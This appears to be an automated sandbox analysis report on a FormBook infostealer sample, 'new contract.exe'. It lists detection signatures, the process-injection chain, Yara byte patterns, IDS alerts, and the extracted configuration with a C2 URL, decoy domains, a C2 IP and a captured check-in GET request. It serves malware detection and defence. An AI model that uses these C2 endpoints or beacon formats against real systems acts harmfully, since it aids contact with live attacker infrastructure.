
Windows Analysis Report
new contract.exe

Overview

General Information

Sample name: new contract.exe
Analysis ID: 1531093
MD5: c6b38036b68ea21306e8814ab1b1b4d9
SHA1: 6b1ee982b77f2274ff6844f06706f13418dc6aa0
SHA256: 732336eccda1e0e01a9474a968eb6ac9725fec8e8e03ad950472df75ba470693
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Tries to resolve many domain names, but no domain seems valid
Uses netstat to query active network connections and open ports
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • new contract.exe (PID: 7424 cmdline: "C:\Users\user\Desktop\new contract.exe" MD5: C6B38036B68EA21306E8814AB1B1B4D9)
    • new contract.exe (PID: 7648 cmdline: "C:\Users\user\Desktop\new contract.exe" MD5: C6B38036B68EA21306E8814AB1B1B4D9)
      • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • autofmt.exe (PID: 7724 cmdline: "C:\Windows\SysWOW64\autofmt.exe" MD5: C72D80A976B7EB40534E8464957A979F)
        • NETSTAT.EXE (PID: 7732 cmdline: "C:\Windows\SysWOW64\NETSTAT.EXE" MD5: 9DB170ED520A6DD57B5AC92EC537368A)
          • cmd.exe (PID: 7788 cmdline: /c del "C:\Users\user\Desktop\new contract.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
Source | Rule | Description | Author | Strings
00000002.00000002.1806364473.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000002.00000002.1806364473.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000002.00000002.1806364473.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
      • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0x1cb80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000002.00000002.1806364473.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b8e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c8ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.1806364473.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
      • 0x18809:$sqlite3step: 68 34 1C 7B E1
      • 0x1891c:$sqlite3step: 68 34 1C 7B E1
      • 0x18838:$sqlite3text: 68 38 2A 90 C5
      • 0x1895d:$sqlite3text: 68 38 2A 90 C5
      • 0x1884b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x18973:$sqlite3blob: 68 53 D8 7F 8C
Source | Rule | Description | Author | Strings
2.2.new contract.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
2.2.new contract.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
2.2.new contract.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
          • 0x5451:$a1: 3C 30 50 4F 53 54 74 09 40
          • 0x1bd80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x9bbf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x14aa7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
2.2.new contract.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x148a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x149a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x978a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1360c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa483:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1aae7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1baea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
2.2.new contract.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
          • 0x17a09:$sqlite3step: 68 34 1C 7B E1
          • 0x17b1c:$sqlite3step: 68 34 1C 7B E1
          • 0x17a38:$sqlite3text: 68 38 2A 90 C5
          • 0x17b5d:$sqlite3text: 68 38 2A 90 C5
          • 0x17a4b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x17b73:$sqlite3blob: 68 53 D8 7F 8C
No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-10T21:06:44.004230+0200 | 2031453 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49979 | 89.31.143.90 | 80 | TCP



AV Detection

Source: 00000002.00000002.1806364473.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Malware Configuration Extractor: FormBook {"C2 list": ["www.aycare-service-99683.bond/c89p/"], "decoy": ["ftersaleb.top", "dcustomdesgins.net", "ostbet2024.live", "rhgtrdjdjytkyhretrdjfytd.buzz", "atauniversity.tech", "idoctor365.net", "x-design-courses-29670.bond", "ellowold-pc.top", "ransportationmmsytpro.top", "areerfest.xyz", "artiresbah-in.today", "ijie.pro", "torehousestudio.info", "69-11-luxury-watches.shop", "earing-tests-44243.bond", "hits.shop", "hzl9.bond", "lood-test-jp-1.bond", "livialiving.online", "usymomsmakingmoney.online", "olar-systems-panels-61747.bond", "hinawinner.top", "oldensky10.xyz", "oginsuperking777.click", "oviepicker.net", "partment-rental05.online", "ldkp.net", "sofaerb.shop", "ydh5.beauty", "aston-saaaa.buzz", "acuum-cleaner-84018.bond", "usiness-printer-37559.bond", "dindadisini12.click", "j7zd12m.xyz", "plesacv.xyz", "trustcapital247.online", "asapembuatanpatung.online", "ent-all.xyz", "r64mh1.vip", "aser-cap-hair-growth.today", "amattva.company", "herightfits.top", "uickautoquote.net", "ctu36ojboz6w2cl.asia", "oursmile.vip", "astysavor.website", "iam-saaab.buzz", "igmoto.info", "itchellcohen.net", "un-sea.fun", "steticavonixx.shop", "arklife.shop", "bsboffchatrussummsa.online", "iuxing.asia", "okenexchange.art", "llhealthreview.online", "refabricated-homes-53685.bond", "atercraze.net", "osmits.net", "rail.cruises", "utanginamo.sbs", "hapanda.fun", "arehouse-inventory-29693.bond", "innivip.bio"]}
Source: new contract.exe | ReversingLabs: Detection: 50%
Source: Yara match | File source: 2.2.new contract.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.new contract.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.1806364473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4129188271.00000000027A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4129245511.00000000027D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4128918968.0000000000510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1741421854.0000000003F59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: new contract.exe | Joe Sandbox ML: detected
Source: new contract.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: new contract.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: netstat.pdbGCTL source: new contract.exe, 00000002.00000002.1806754751.000000000119E000.00000004.00000020.00020000.00000000.sdmp, new contract.exe, 00000002.00000002.1806662425.0000000001130000.00000040.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.4129159604.0000000000680000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: netstat.pdb source: new contract.exe, 00000002.00000002.1806754751.000000000119E000.00000004.00000020.00020000.00000000.sdmp, new contract.exe, 00000002.00000002.1806662425.0000000001130000.00000040.10000000.00040000.00000000.sdmp, NETSTAT.EXE, NETSTAT.EXE, 00000005.00000002.4129159604.0000000000680000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: new contract.exe, 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000003.1808242227.0000000002F63000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.4130129795.0000000003110000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000003.1806702400.0000000002DB3000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.4130129795.00000000032AE000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: new contract.exe, new contract.exe, 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, NETSTAT.EXE, 00000005.00000003.1808242227.0000000002F63000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.4130129795.0000000003110000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000003.1806702400.0000000002DB3000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.4130129795.00000000032AE000.00000040.00001000.00020000.00000000.sdmp

Networking

Source: Network traffic | Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49979 -> 89.31.143.90:80
Source: Network traffic | Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49979 -> 89.31.143.90:80
Source: Network traffic | Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49979 -> 89.31.143.90:80
Source: Malware configuration extractor | URLs: www.aycare-service-99683.bond/c89p/
Source: unknown | DNS traffic detected: query: www.uickautoquote.net, reply code: Name error (3)
Source: unknown | DNS traffic detected: query: www.aser-cap-hair-growth.today, reply code: Name error (3)
Source: unknown | DNS traffic detected: query: www.livialiving.online, reply code: Name error (3)
Source: unknown | DNS traffic detected: query: www.innivip.bio, reply code: Name error (3)
Source: unknown | DNS traffic detected: query: www.arklife.shop, reply code: Name error (3)
Source: unknown | DNS traffic detected: query: www.sofaerb.shop, reply code: Name error (3)
Source: unknown | DNS traffic detected: query: www.r64mh1.vip, reply code: Name error (3)
Source: unknown | DNS traffic detected: query: www.ldkp.net, reply code: Name error (3)
Source: unknown | DNS traffic detected: query: www.aycare-service-99683.bond, reply code: Name error (3)
Source: unknown | DNS traffic detected: query: www.olar-systems-panels-61747.bond, reply code: Name error (3)
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\NETSTAT.EXE "C:\Windows\SysWOW64\NETSTAT.EXE"
Source: global traffic | HTTP traffic detected: GET /c89p/?ohUpTpT0=uK/A8O6Hj9VReqQKS0ATE3Xrf7RWVy6yiEUunzdvsHMfMNs/vPJv/pK5tSC7SJ1XhvpN&BZL00t=YrClV4dXu8Ftc4cp HTTP/1.1 Host: www.igmoto.info Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: Joe Sandbox View | IP Address: 89.31.143.90
Source: Joe Sandbox View | ASN Name: QSC-AG-IPXDE
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Windows\explorer.exe | Code function: 3_2_0E4E3F82 getaddrinfo,setsockopt,recv, 3_2_0E4E3F82
Source: global traffic | DNS traffic detected: DNS query: www.livialiving.online
Source: global traffic | DNS traffic detected: DNS query: www.innivip.bio
Source: global traffic | DNS traffic detected: DNS query: www.aser-cap-hair-growth.today
Source: global traffic | DNS traffic detected: DNS query: www.igmoto.info
Source: global traffic | DNS traffic detected: DNS query: www.olar-systems-panels-61747.bond
Source: global traffic | DNS traffic detected: DNS query: www.arklife.shop
Source: global traffic | DNS traffic detected: DNS query: www.sofaerb.shop
Source: global traffic | DNS traffic detected: DNS query: www.uickautoquote.net
Source: global traffic | DNS traffic detected: DNS query: www.ldkp.net
Source: global traffic | DNS traffic detected: DNS query: www.r64mh1.vip
Source: global traffic | DNS traffic detected: DNS query: www.aycare-service-99683.bond
Source: explorer.exe, 00000003.00000003.3108632093.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4137734556.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1752045440.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1745295797.00000000079FB000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 00000003.00000003.3108632093.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4137734556.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1752045440.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1745295797.00000000079FB000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000003.00000003.3108632093.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4137734556.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1752045440.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1745295797.00000000079FB000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: explorer.exe, 00000003.00000003.3108632093.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4137734556.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1752045440.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1745295797.00000000079FB000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000003.00000000.1745295797.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 00000003.00000000.1745295797.00000000079B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3484154679.00000000079B5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108475652.00000000079B5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.00000000079B1000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://schemas.mi
Source: explorer.exe, 00000003.00000000.1745295797.00000000079B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3484154679.00000000079B5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108475652.00000000079B5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.00000000079B1000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://schemas.micr
Source: explorer.exe, 00000003.00000000.1755546236.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.4136528142.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1749262863.0000000007F40000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://schemas.micro
Source: new contract.exe, 00000000.00000002.1743231924.0000000007172000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.arklife.shop
Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.arklife.shop/c89p/
Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.arklife.shop/c89p/www.sofaerb.shop
Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.arklife.shopReferer:
Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.aser-cap-hair-growth.today
Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.aser-cap-hair-growth.today/c89p/
Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.aser-cap-hair-growth.today/c89p/www.igmoto.info
Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.aser-cap-hair-growth.todayReferer:
Source: explorer.exe, 00000003.00000000.1745295797.00000000079B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108475652.00000000079B5000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.aycare-service-99683.bond
Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.aycare-service-99683.bond/c89p/
Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.aycare-service-99683.bond/c89p/www.x-design-courses-29670.bond
Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.aycare-service-99683.bondReferer:
Source: new contract.exe, 00000000.00000002.1743231924.0000000007172000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: new contract.exe, 00000000.00000002.1743231924.0000000007172000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: new contract.exe, 00000000.00000002.1743231924.0000000007172000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: new contract.exe, 00000000.00000002.1743231924.0000000007172000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: new contract.exe, 00000000.00000002.1743231924.0000000007172000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: new contract.exe, 00000000.00000002.1743231924.0000000007172000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: new contract.exe, 00000000.00000002.1743231924.0000000007172000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: new contract.exe, 00000000.00000002.1743231924.0000000007172000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: new contract.exe, 00000000.00000002.1743231924.0000000007172000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: new contract.exe, 00000000.00000002.1743231924.0000000007172000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fonts.com
Source: new contract.exe, 00000000.00000002.1743231924.0000000007172000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: new contract.exe, 00000000.00000002.1743231924.0000000007172000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: new contract.exe, 00000000.00000002.1743231924.0000000007172000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: new contract.exe, 00000000.00000002.1743231924.0000000007172000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: new contract.exe, 00000000.00000002.1743231924.0000000007172000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: new contract.exe, 00000000.00000002.1743231924.0000000007172000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.hinawinner.top
